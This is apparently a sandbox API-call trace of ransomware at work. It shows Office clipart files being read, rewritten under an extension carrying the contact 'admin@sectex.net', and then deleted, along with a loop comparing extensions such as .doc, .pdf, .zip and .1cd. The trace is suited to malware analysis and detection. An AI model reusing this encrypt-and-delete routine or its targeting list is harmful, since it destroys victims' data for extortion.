	[0147.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.008] GetLastError () returned 0x0
	[0147.008] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x121a, lpOverlapped=0x0) returned 1
	[0147.050] WriteFile (in: hFile=0x268, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1220, lpOverlapped=0x0) returned 1
	[0147.051] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.051] WriteFile (in: hFile=0x268, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.051] SetEndOfFile (hFile=0x268) returned 1
	[0147.052] CloseHandle (hObject=0x268) returned 1
	[0147.052] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.052] SetEndOfFile (hFile=0x384) returned 1
	[0147.054] CloseHandle (hObject=0x384) returned 1
	[0147.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf")) returned 1
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.055] lstrlenW (lpString=".doc") returned 4
	[0147.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString=".docx") returned 5
	[0147.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.055] lstrlenW (lpString=".pdf") returned 4
	[0147.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString=".xls") returned 4
	[0147.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.055] lstrlenW (lpString=".xlsx") returned 5
	[0147.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.055] lstrlenW (lpString=".ppt") returned 4
	[0147.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.055] lstrlenW (lpString=".zip") returned 4
	[0147.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.055] lstrlenW (lpString=".rar") returned 4
	[0147.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString=".bz2") returned 4
	[0147.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString=".7z") returned 3
	[0147.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.055] lstrlenW (lpString=".dbf") returned 4
	[0147.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.055] lstrlenW (lpString=".1cd") returned 4
	[0147.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString=".jpg") returned 4
	[0147.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString=".doc") returned 4
	[0147.056] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString=".docx") returned 5
	[0147.056] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.056] lstrlenW (lpString=".pdf") returned 4
	[0147.056] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString=".xls") returned 4
	[0147.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.056] lstrlenW (lpString=".xlsx") returned 5
	[0147.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.056] lstrlenW (lpString=".ppt") returned 4
	[0147.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString=".zip") returned 4
	[0147.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.056] lstrlenW (lpString=".rar") returned 4
	[0147.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString=".bz2") returned 4
	[0147.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString=".7z") returned 3
	[0147.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString=".dbf") returned 4
	[0147.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.056] lstrlenW (lpString=".1cd") returned 4
	[0147.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63
	[0147.057] lstrlenW (lpString=".jpg") returned 4
	[0147.057] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.057] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.057] lstrlenW (lpString="FD01191_.WMF") returned 12
	[0147.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0147.339] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3964) returned 1
	[0147.339] CloseHandle (hObject=0x3d4) returned 1
	[0147.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf")) returned 0x20
	[0147.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.364] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.365] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.365] GetLastError () returned 0x0
	[0147.365] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xf7c, lpOverlapped=0x0) returned 1
	[0147.376] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xf80, lpOverlapped=0x0) returned 1
	[0147.377] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.377] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.377] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.378] CloseHandle (hObject=0x3b8) returned 1
	[0147.378] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.378] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.380] CloseHandle (hObject=0x2a0) returned 1
	[0147.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf")) returned 1
	[0147.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.384] lstrlenW (lpString=".doc") returned 4
	[0147.384] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.384] lstrlenW (lpString=".docx") returned 5
	[0147.384] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.384] lstrlenW (lpString=".pdf") returned 4
	[0147.384] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.384] lstrlenW (lpString=".xls") returned 4
	[0147.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.384] lstrlenW (lpString=".xlsx") returned 5
	[0147.385] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.385] lstrlenW (lpString=".ppt") returned 4
	[0147.385] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString=".zip") returned 4
	[0147.385] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.385] lstrlenW (lpString=".rar") returned 4
	[0147.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString=".bz2") returned 4
	[0147.385] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString=".7z") returned 3
	[0147.385] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString=".dbf") returned 4
	[0147.385] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString=".1cd") returned 4
	[0147.385] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString=".jpg") returned 4
	[0147.385] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.385] lstrlenW (lpString=".doc") returned 4
	[0147.385] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString=".docx") returned 5
	[0147.385] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.385] lstrlenW (lpString=".pdf") returned 4
	[0147.385] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.385] lstrlenW (lpString=".xls") returned 4
	[0147.385] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.385] lstrlenW (lpString=".xlsx") returned 5
	[0147.386] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.386] lstrlenW (lpString=".ppt") returned 4
	[0147.386] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.386] lstrlenW (lpString=".zip") returned 4
	[0147.386] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.386] lstrlenW (lpString=".rar") returned 4
	[0147.386] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.386] lstrlenW (lpString=".bz2") returned 4
	[0147.386] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.386] lstrlenW (lpString=".7z") returned 3
	[0147.386] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.386] lstrlenW (lpString=".dbf") returned 4
	[0147.386] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.386] lstrlenW (lpString=".1cd") returned 4
	[0147.386] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63
	[0147.386] lstrlenW (lpString=".jpg") returned 4
	[0147.386] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.386] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.386] lstrlenW (lpString="FLAP.WMF") returned 8
	[0147.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0147.398] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2070) returned 1
	[0147.398] CloseHandle (hObject=0x3d4) returned 1
	[0147.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf")) returned 0x20
	[0147.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0147.399] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.399] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0147.399] GetLastError () returned 0x0
	[0147.399] ReadFile (in: hFile=0x3d4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x816, lpOverlapped=0x0) returned 1
	[0147.420] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x820, lpOverlapped=0x0) returned 1
	[0147.421] ReadFile (in: hFile=0x3d4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.421] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0147.421] SetEndOfFile (hFile=0x3c0) returned 1
	[0147.422] CloseHandle (hObject=0x3c0) returned 1
	[0147.422] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.422] SetEndOfFile (hFile=0x3d4) returned 1
	[0147.424] CloseHandle (hObject=0x3d4) returned 1
	[0147.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.424] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf")) returned 1
	[0147.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.424] lstrlenW (lpString=".doc") returned 4
	[0147.425] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString=".docx") returned 5
	[0147.425] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0147.425] lstrlenW (lpString=".pdf") returned 4
	[0147.425] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString=".xls") returned 4
	[0147.425] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.425] lstrlenW (lpString=".xlsx") returned 5
	[0147.425] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0147.425] lstrlenW (lpString=".ppt") returned 4
	[0147.425] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.425] lstrlenW (lpString=".zip") returned 4
	[0147.425] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.425] lstrlenW (lpString=".rar") returned 4
	[0147.425] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString=".bz2") returned 4
	[0147.425] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString=".7z") returned 3
	[0147.425] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.425] lstrlenW (lpString=".dbf") returned 4
	[0147.425] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.425] lstrlenW (lpString=".1cd") returned 4
	[0147.425] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.425] lstrlenW (lpString=".jpg") returned 4
	[0147.425] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString=".doc") returned 4
	[0147.426] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString=".docx") returned 5
	[0147.426] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0147.426] lstrlenW (lpString=".pdf") returned 4
	[0147.426] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString=".xls") returned 4
	[0147.426] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.426] lstrlenW (lpString=".xlsx") returned 5
	[0147.426] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0147.426] lstrlenW (lpString=".ppt") returned 4
	[0147.426] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString=".zip") returned 4
	[0147.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.426] lstrlenW (lpString=".rar") returned 4
	[0147.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString=".bz2") returned 4
	[0147.426] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString=".7z") returned 3
	[0147.426] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString=".dbf") returned 4
	[0147.426] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString=".1cd") returned 4
	[0147.426] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59
	[0147.426] lstrlenW (lpString=".jpg") returned 4
	[0147.426] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.427] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.427] lstrlenW (lpString="HH00057_.WMF") returned 12
	[0147.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.474] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3764) returned 1
	[0147.474] CloseHandle (hObject=0x398) returned 1
	[0147.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf")) returned 0x20
	[0147.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.552] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.552] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
